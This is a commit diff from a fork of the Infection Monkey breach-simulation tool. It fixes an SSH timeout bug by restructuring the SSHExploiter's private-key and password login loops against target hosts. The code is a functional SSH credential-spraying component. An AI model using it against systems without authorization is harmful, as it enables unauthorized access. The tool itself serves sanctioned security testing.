forked from p15670423/monkey
SSH banner read timeout exception (tunneling) bugfix
This commit is contained in:
parent
dba52fcbed
commit
a6e61215f3
|
@ -5,11 +5,11 @@ import time
|
||||||
import paramiko
|
import paramiko
|
||||||
|
|
||||||
import infection_monkey.monkeyfs as monkeyfs
|
import infection_monkey.monkeyfs as monkeyfs
|
||||||
from common.utils.exploit_enum import ExploitType
|
|
||||||
from infection_monkey.exploit import HostExploiter
|
from infection_monkey.exploit import HostExploiter
|
||||||
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
|
from infection_monkey.exploit.tools.helpers import get_target_monkey, get_monkey_depth, build_monkey_commandline
|
||||||
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
from infection_monkey.exploit.tools.helpers import get_interface_to_target
|
||||||
from infection_monkey.model import MONKEY_ARG
|
from infection_monkey.model import MONKEY_ARG
|
||||||
|
from infection_monkey.exploit.tools.exceptions import FailedExploitationError
|
||||||
from infection_monkey.network.tools import check_tcp_port
|
from infection_monkey.network.tools import check_tcp_port
|
||||||
from common.utils.exploit_enum import ExploitType
|
from common.utils.exploit_enum import ExploitType
|
||||||
from common.utils.attack_utils import ScanStatus
|
from common.utils.attack_utils import ScanStatus
|
||||||
|
@ -38,15 +38,16 @@ class SSHExploiter(HostExploiter):
|
||||||
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
|
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
|
||||||
self._update_timestamp = time.time()
|
self._update_timestamp = time.time()
|
||||||
|
|
||||||
def exploit_with_ssh_keys(self, port, ssh):
|
def exploit_with_ssh_keys(self, port) -> paramiko.SSHClient:
|
||||||
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
|
user_ssh_key_pairs = self._config.get_exploit_user_ssh_key_pairs()
|
||||||
|
|
||||||
exploited = False
|
|
||||||
|
|
||||||
for user, ssh_key_pair in user_ssh_key_pairs:
|
for user, ssh_key_pair in user_ssh_key_pairs:
|
||||||
# Creating file-like private key for paramiko
|
# Creating file-like private key for paramiko
|
||||||
pkey = io.StringIO(ssh_key_pair['private_key'])
|
pkey = io.StringIO(ssh_key_pair['private_key'])
|
||||||
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
|
ssh_string = "%s@%s" % (ssh_key_pair['user'], ssh_key_pair['ip'])
|
||||||
|
|
||||||
|
ssh = paramiko.SSHClient()
|
||||||
|
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||||
try:
|
try:
|
||||||
pkey = paramiko.RSAKey.from_private_key(pkey)
|
pkey = paramiko.RSAKey.from_private_key(pkey)
|
||||||
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
|
except(IOError, paramiko.SSHException, paramiko.PasswordRequiredException):
|
||||||
|
@ -55,52 +56,49 @@ class SSHExploiter(HostExploiter):
|
||||||
ssh.connect(self.host.ip_addr,
|
ssh.connect(self.host.ip_addr,
|
||||||
username=user,
|
username=user,
|
||||||
pkey=pkey,
|
pkey=pkey,
|
||||||
port=port,
|
port=port)
|
||||||
timeout=None)
|
|
||||||
LOG.debug("Successfully logged in %s using %s users private key",
|
LOG.debug("Successfully logged in %s using %s users private key",
|
||||||
self.host, ssh_string)
|
self.host, ssh_string)
|
||||||
exploited = True
|
|
||||||
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
self.report_login_attempt(True, user, ssh_key=ssh_string)
|
||||||
break
|
return ssh
|
||||||
except Exception as exc:
|
except Exception:
|
||||||
|
ssh.close()
|
||||||
LOG.debug("Error logging into victim %r with %s"
|
LOG.debug("Error logging into victim %r with %s"
|
||||||
" private key", self.host,
|
" private key", self.host,
|
||||||
ssh_string)
|
ssh_string)
|
||||||
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
self.report_login_attempt(False, user, ssh_key=ssh_string)
|
||||||
continue
|
continue
|
||||||
return exploited
|
raise FailedExploitationError
|
||||||
|
|
||||||
def exploit_with_login_creds(self, port, ssh):
|
def exploit_with_login_creds(self, port) -> paramiko.SSHClient:
|
||||||
user_password_pairs = self._config.get_exploit_user_password_pairs()
|
user_password_pairs = self._config.get_exploit_user_password_pairs()
|
||||||
|
|
||||||
exploited = False
|
|
||||||
|
|
||||||
for user, current_password in user_password_pairs:
|
for user, current_password in user_password_pairs:
|
||||||
|
|
||||||
|
ssh = paramiko.SSHClient()
|
||||||
|
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
||||||
try:
|
try:
|
||||||
ssh.connect(self.host.ip_addr,
|
ssh.connect(self.host.ip_addr,
|
||||||
username=user,
|
username=user,
|
||||||
password=current_password,
|
password=current_password,
|
||||||
port=port,
|
port=port)
|
||||||
timeout=None)
|
|
||||||
|
|
||||||
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
|
LOG.debug("Successfully logged in %r using SSH. User: %s, pass (SHA-512): %s)",
|
||||||
self.host, user, self._config.hash_sensitive_data(current_password))
|
self.host, user, self._config.hash_sensitive_data(current_password))
|
||||||
exploited = True
|
|
||||||
self.add_vuln_port(port)
|
self.add_vuln_port(port)
|
||||||
self.report_login_attempt(True, user, current_password)
|
self.report_login_attempt(True, user, current_password)
|
||||||
break
|
return ssh
|
||||||
|
|
||||||
except Exception as exc:
|
except Exception as exc:
|
||||||
LOG.debug("Error logging into victim %r with user"
|
LOG.debug("Error logging into victim %r with user"
|
||||||
" %s and password (SHA-512) '%s': (%s)", self.host,
|
" %s and password (SHA-512) '%s': (%s)", self.host,
|
||||||
user, self._config.hash_sensitive_data(current_password), exc)
|
user, self._config.hash_sensitive_data(current_password), exc)
|
||||||
self.report_login_attempt(False, user, current_password)
|
self.report_login_attempt(False, user, current_password)
|
||||||
|
ssh.close()
|
||||||
continue
|
continue
|
||||||
return exploited
|
raise FailedExploitationError
|
||||||
|
|
||||||
def _exploit_host(self):
|
def _exploit_host(self):
|
||||||
ssh = paramiko.SSHClient()
|
|
||||||
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
|
|
||||||
|
|
||||||
port = SSH_PORT
|
port = SSH_PORT
|
||||||
# if ssh banner found on different port, use that port.
|
# if ssh banner found on different port, use that port.
|
||||||
|
@ -113,12 +111,12 @@ class SSHExploiter(HostExploiter):
|
||||||
LOG.info("SSH port is closed on %r, skipping", self.host)
|
LOG.info("SSH port is closed on %r, skipping", self.host)
|
||||||
return False
|
return False
|
||||||
|
|
||||||
# Check for possible ssh exploits
|
try:
|
||||||
exploited = self.exploit_with_ssh_keys(port, ssh)
|
ssh = self.exploit_with_ssh_keys(port)
|
||||||
if not exploited:
|
except FailedExploitationError:
|
||||||
exploited = self.exploit_with_login_creds(port, ssh)
|
try:
|
||||||
|
ssh = self.exploit_with_login_creds(port)
|
||||||
if not exploited:
|
except FailedExploitationError:
|
||||||
LOG.debug("Exploiter SSHExploiter is giving up...")
|
LOG.debug("Exploiter SSHExploiter is giving up...")
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
|
@ -2,4 +2,7 @@
|
||||||
|
|
||||||
class ExploitingVulnerableMachineError(Exception):
|
class ExploitingVulnerableMachineError(Exception):
|
||||||
""" Raise when exploiter failed, but machine is vulnerable"""
|
""" Raise when exploiter failed, but machine is vulnerable"""
|
||||||
pass
|
|
||||||
|
|
||||||
|
class FailedExploitationError(Exception):
|
||||||
|
""" Raise when exploiter fails instead of returning False"""
|
||||||
|
|
Loading…
Reference in New Issue